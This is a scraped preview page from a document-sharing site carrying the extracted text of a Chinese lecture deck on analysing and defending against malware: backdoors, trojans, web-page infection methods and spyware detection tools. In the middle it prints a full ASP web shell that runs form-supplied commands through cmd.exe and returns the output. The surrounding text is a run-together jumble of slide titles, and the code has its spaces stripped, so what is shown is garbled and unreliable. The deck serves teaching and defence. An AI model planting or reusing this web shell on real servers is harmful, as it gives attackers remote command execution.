预览加载中,请您耐心等待几秒...
1/10
2/10
3/10
4/10
5/10
6/10
7/10
8/10
9/10
10/10

亲,该文档总共63页,到这已经超出免费预览范围,如果喜欢就直接下载吧~

如果您无法下载资料,请参考说明:

1、部分资料下载需要金币,请确保您的账户上有足够的金币

2、已购买过的文档,再次下载不重复扣费

3、资料包下载后请先用软件解压,在使用对应软件打开

恶意软件(病毒)的分析与防范Defence&analysisofmalware后门后门的类型后门的安装后门举例其他Windows下的后门程序无端口后门-如何唤醒Bits--glacierGUI(GraphicsUserInterface)远程控制VNC后门的启动检测Windows后门启动技术AutoRuns的运行界面如何防御后门--普通后门如何防御后门--无端口后门2.特洛伊木马后门VS特洛伊木马特洛伊木马212.1名字欺骗对命名陷阱的防御2.2文件捆绑2.3软件下载2.4软件本身带毒2.5Html传播网页病毒的传播方式plmm001.gifFlash传播网页email传播网页email传播网页email传播网页Chm传播网页木马exe2bmpx.htmx.asp正常网页中携带网页病毒、网页木马的原理Javascript.Exception.Exploit错误的MIMEMultipurposeInternetMailExtentionsiframeStartup.htmlHTA的全名为HTMLApplication各种溢出型漏洞木马的发展<%OnErrorResumeNext%> <%SetoScript=Server.CreateObject("WSCRIPT.SHELL")%> <%SetoFileSys=Server.CreateObject("Scripting.FileSystemObject")%> <%cmd=Request.Form(".CMD")%> <%If(cmd<>"")Then%> <%szTempFile="C:\\"&oFileSys.GetTempName()%> <%CalloScript.Run("cmd.exe/c"&cmd&">"&szTempFile,0,True)%> <%SetoFile=oFileSys.OpenTextFile(szTempFile,1,False,0)%> <%EndIf%> <FORMaction="<%=Request.ServerVariables("URL")%>"method="POST"> <inputtype=textname=".CMD"size=45value="<%=cmd%>"> <inputtype=submitvalue="Execute"class=input></FORM> <PRE><%If(IsObject(oFile))Then%> <%OnErrorResumeNext%> <%Response.WriteServer.HTMLEncode(oFile.ReadAll)%> <%oFile.Close%> <%CalloFileSys.DeleteFile(szTempFile,True)%> <%EndIf%></PRE> 木马检测工具木马防线2005+木马克星间谍软件间谍软件的传播方式部分间谍和广告软件Continue发展趋势间谍软件检测工具间谍软件检测工具间谍软件检测工具HideinformationinafileHideinformationinafile